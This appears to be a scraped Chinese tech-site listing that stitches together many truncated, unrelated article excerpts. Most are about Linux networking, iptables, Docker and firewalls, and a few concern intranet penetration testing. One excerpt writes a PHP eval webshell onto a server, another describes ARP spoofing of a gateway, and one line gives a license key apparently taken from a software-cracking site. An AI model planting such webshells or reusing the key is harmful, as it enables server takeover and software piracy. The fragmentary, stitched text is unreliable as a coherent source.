Nmap是Network Mapper的简称。Nmap是一款免费、开源的网络发现和侦察工具。Nmap可以扫描网络中的处于活动状态的主机、开放端口、操作系统版本和服务检测以及执行隐匿方式的信息扫描。安装方式如下:
本周进行了一个关于通过 java 代码获取本机 ip 地址的线上性能优化,这篇文章做一个总结,也提供一些 java 线上优化排查思路和更进一步的思考与总结。
渗透测试的本质是信息收集,我们可以将内网信息收集大致分为5个步骤,即本机信息收集、域内信息收集、登录凭证窃取、存活主机探测、内网端口扫描。
uname -a (或者hostname)可以看到hostname,修改步骤如下:
当向外界主机发送数据时,在它从网卡流入后需要对它做路由决策,根据其目标决定是流入本机数据还是转发给其他主机,如果是流入本机的数据,则数据会从内核空间进入用户空间(被应用程序接收、处理)。当用户空间响应(应用程序生成新的数据包)时,响应数据包是本机产生的新数据,在响应包流出之前,需要做路由决策,根据目标决定从哪个网卡流出。
本文介绍linux服务器安装keepalive服务,结合腾讯云的HAVIP(高可用虚拟IP)配置云服务器主备实验
只修将这个配置文件中的信息改变为:static、yes。其中IP地址、网关协议以及域名解析系统公司用给出,直接按着修改即可。
选择一个SNMP版本,比如5.7.1,下载地址如下:http://sourceforge.net/projects/net-snmp/files/net-snmp/5.7.1/,如下图所示:
在Ubuntu下用eclipse连接集群查看文件信息提示9000端口拒绝连接的错误 Cannot connect to the Map/Reduce location: Hadoop1.0.3
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
我们操作 Linux 系统也有两种方式,一种是直接在 Linux 本机进行操作(类似人和人之间面对面交谈),另一种是借助客户端远程操作(类似打电话)。
随着互联网的普及,安全性变得愈发重要。在保护你的Linux服务器免受恶意攻击和未经授权的访问方面,配置一款强大的防火墙是必不可少的。今天,我们将介绍一种简单而有效的方法——使用Uncomplicated Firewall(UFW)来保护你的Linux系统。
我们知道,一台计算机如果要上网,必定要连接网线或wifi,所以计算机内是有与网线、WiFi对应的连接设备的,这就是网卡。而且除了连接网线或WiFi外,网卡上还需要配置正确的ip、子网掩码、网关、dns等参数。那么,我们现在就来学习一下如何查看、配置网卡的这些参数。
1:创建Dockerfile文件,用于构建镜像 如果你还不知道Dockerfile如何创建,请移步我的另一篇博客:https://blog.csdn.net/CSDN___LYY/article/details/83061188 注意点: dockerfile中的路径统一 这里使用的版本较低(被容器化的项目使用的比较旧),如需使用其他版本的jdk或者tomcat,找到相应的url替换对应http位置即可 我的项目的数据库使用的是远程数据库,所以没有在镜像中加入数据库的构建,还
Registered Name: https://zhile.io License Key: 48891cf209c6d32bf4
作为划水选手,我们肯定会接触过这样一个东西 -> Virtual loopback interface。当我们写的应用/服务想在同一台机器上进行通信的时候,基本都会使用到它。
作为一个开发人员,日常的工作、学习,经常需要用到各种Linux,但是我们不可能去找大量(土豪跳过)的物理机来供我们学习,因此使用虚拟机进行开发及学习是我们常用的一种方式;下面带你基于VirtualBox搭建Linux(CentOS)虚拟机环境;
前段时间读了读徐哥的《内网安全攻防》,并复现了部分知识点,写篇文章记录下学习内容。
作为一个码农,日常的开发和学习的过程中,经常需要用到大量的Linux机器,但是我们不可能去找大量(土豪跳过)的物理机来供我们学习,因此使用虚拟机进行开发及学习是我们常用的一种方式;下面就记录一个基于VirtualBox搭建Linux(CentOS)虚拟机环境的过程;VMware虚拟机也使用过,但是使用的过程中会出现一些各种各样的问题,有时候不光影响到虚拟机的使用,甚至会影响到其他软件的使用;但是VirtualBox使用使用起来就很顺手,因此这里推荐使用VirtualBox。
ELK介绍 在平时的工作当中,需要一个日志分析系统来分析各种各样的告警信息,而ELK可以简单满足这个需求。
后台程序(通常被称为守护进程或服务进程)处理了linux系统的大部分任务,日志是记录这些进程的详细信息和错误信息的文件
这里用的是centOS7、3.1安装docker,大家最好也同步一下 centOS7镜像可以从阿里云拉取一个,然后在搭建linux的时候跟之前版本差不多,只不过需要更改的点是 配置步骤
通常,我们拿到一台服务器后使用338端口远程桌面登录windows系统,使用22端口ssh登录linux系统。如果隔一段时间稍微留意一下爆破日志,通常能够看到来自全球各地的ip在爆破我们的登录账号密码。
在搭建Linux集群服务的时候,主服务器需要启动从服务器的服务,如果通过手动启动,集群内服务器几台还好,要是像阿里1000台的云梯hadoop集群的话,轨迹启动一次集群就得几个工程师一两天时间,是不是很恐怖。如果使用免密登录,主服务器就能通过程序执行启动脚步,自动帮我们将从服务器的应用启动。而这一切就是建立在ssh服务的免密码登录之上的。所以要学习集群部署,就必须了解linux的免密码登录。
通常一个 Web 项目上线,我们会把开发完成的服务部署在Tomcat 服务器里面,然后需要的持久化数据会存放在数据库 Mysql,那么在服务运行时,少不了 Tomcat 和 Mysql 的交互。
菜鸡又来发表文章了,一开始的时候对整个内网的拓扑结构还不熟,所以做的时候很乱,写的也很乱。有很多方法都没有想到去用。qaq大佬们多多指教。
一开始的时候对整个内网的拓扑结构还不熟,所以做的时候有很多方法都没有想到去用,大家多多指教。 一、环境准备 用网线连接交换机 配置Winodwss攻击机IP为172.16.6.203 攻击机Kali IP为172.16.6.202 主机IP为172.16.6.201 网关为172.16.6.1 子网掩码255.255.255.0 目标IP 172.16.6.10 二、渗透具体流程 总览拓扑图 一开始以为192.168.6.200,一台普通的双网卡主机,没有发现是防火墙,所以10.1.1.0网段的主机拓扑不够
背景: 服务器A:103.110.114.8/192.168.1.8,有外网ip,是IDC的一台服务器 服务器B:192.168.1.150,没有外网ip,A服务器是它的宿主机,能相互ping通 服务器C:192.168.9.120,是公司的一台服务器,能上网。 服务器C可以直接ssh登陆A服务器,但是不能直接登陆服务器B,因为它们处在两个不同的局域网内。 现在要求能从服务器C上ssh登陆服务器B,并且做ssh无密码信任跳转关系。 这就需要用到iptables的NAT端口转发功能了~~~~~ 思路: 让服务
本文旨在通过一些常用命令的用法示例,让有一定linux基础的开发同学能对系统进行简单配置,也能够上服务器定位或者解决一些简单基础性的问题,做出初步故障排除,或者为运维同学描述故障的表现提供帮助。
使用Linux系统,很有必要熟悉一些常用的命令。本文收集整理一些常用的用于检测服务器的配置和硬件信息的命令,需要时可查阅。包括:操作系统、CPU、内存、硬盘分区、系统时间、负载、网络相关、进程、用户、开关机、启动等方面,适用于主流Linux操作系统比如centos、ubuntu、debian等
在内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机进行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。我们如何在不实用扫描器的情况下发现更多主机呢?
iptables的文章多如牛毛,但是,我读了一些,发现虽然成体系,但是不便理解,今天就结合自己的理解,好好讲解下,另外,我们也会使用iptables来实验一个nat地址转换的demo,nat转换,通俗地讲,一般是为了解决ipv4公网地址不够用的问题,因此在学校、公司等机构的有公网ip的服务器上,部署nat软件进行地址转换,如内网机器访问互联网时,将源地址转换为服务器的公网ip;在收到响应时,此时目的地址是公网ip,此时需要修改为内网机器的地址。
rsync通过服务同步: 首先编辑配置文件 vi /etc/rsyncd.conf,然后把新配置文件粘贴进去。添加配置文件需要修改本机IP,和目标机器IP address=本机IP host
一些比较常见的linux命令,主要用于检测服务器的配置和硬件信息,包括:操作系统、CPU、内存、硬盘分区、系统时间、负载、网络相关、进程、用户、开关机、启动等方面,适用于主流操作系统,常见的centos、ubuntu、debian等。
容器是一种新的虚拟化技术,每一个容器都是一个逻辑上独立的网络环境。Linux 上提供了软件虚拟出来的二层交换机 Bridge 可以解决同一个宿主机上多个容器之间互连的问题,但这是不够的。二层交换无法解决容器和宿主机外部网络的互通。
一篇可以参考:内网渗透之——权限维持(获取windows、linux密码,安装后门程序)
IP地址:网络中设备的唯一标识 IP地址分为两大类 IPv4 给每一个连接在网络上的主机分配一个32bit(4个字节)地址 按照TCP/IP规定,IP地址用二进制来表示的,每一个IP地址长32bit(4个字节),但这样处理起来费劲,所以为了方便经常写成十进制的形式,中间使用 “·” 分隔不同的字节 这种表示法叫做:“点分十进制表示法” IPv6 由于互联网的蓬勃发展,IP地址需求量越来越大,但我们知道网络地址资源是有限的,这样使得IP的分配越来越紧张 为了扩大地址,通过IPv6重新定义地址空间,它采用的是1
作为一名 Linux 工程师,会写好的脚本不仅能提高工作效率,还能有更多的时间做自己的事。最近在网上冲浪的时候,也注意收集一些大佬写过的脚本,汇总整理一下,欢迎收藏,与君共勉!
本文接着上文的内容,主要解答上文留下的疑问:既然不能使用InetAddress#getLocalHost()直接去获取到本机的IP地址,那么如何破呢?
在现在这个网络越发便捷的社会,各种网络勒索病毒层出不穷,即使是Google浏览器也是在不断的更新版本修复漏洞。很多人认为只有Windows系统才容易中病毒,若使用Linux系统就不容易中病毒,经常让自己的电脑裸奔运行,既不装杀毒软件,也不开启防火墙。其实Linux下也是存在中病毒的可能的,只是那些病毒几乎是无法像在Windows系统下一样自动运行的,Linux的特性决定了很多时候都需要你给予root权限软件才能运行,这确实使电脑中病毒的几率大大降低了,但是不管你的Linux系统是ubuntu还是其它发行版本,即使你不安装杀毒软件,防火墙也是必须要开启的,可惜我们很多人的电脑都是关闭了防火墙,今天这篇博客主要教大家怎么开启Ubuntu系统的防火墙,避免电脑重要文件遭到窃取。
netfilter/iptables(简称为iptables)组成Linux平台下的包过滤防火墙,与大多数的Linux软件一样,这个包过滤防火墙是免费的,它可以代替昂贵的商业防火墙解决方案,完成封包过滤、封包重定向和网络地址转换(NAT)等功能。
本文和大家分享一下如何在Linux系统本地部署Tale个人博客,并通过Cpolar内网穿透工具配置公网地址,把自己的个人博客发布到公共互联网上,人人都能访问。
一、网络相关 : yum install -y net-tools #ifconfig -a :查看全部的网卡信息 在centOS 7 中,我们使用的网卡为ens33 ,但是在centOS 6或者更往前的版本使用的是eth0。 #ifdown ens33 :关闭ens33这个网卡 #ifup ens33 :打开ens33这个网卡 有时候我们通过远程连接工具连接服务器,如果必须重启某个特定的网卡我们需要这样操作: #ifdown ens33 && ifup ens33 在日常的运维当中,有时候我们需要对一台服
写个php一句话后门上去: [jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.
下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)
两个网卡. 绿色标注的是网卡名称.这只是一个名称,不重要. 通过 ifconfig查看IP地址.一个是本机测试网卡是否 正常通信的IP地址.也就是本地地址.一般称为 location Address . 另一个就是外部通讯IP了.
领取专属 10元无门槛券
手把手带您无忧上云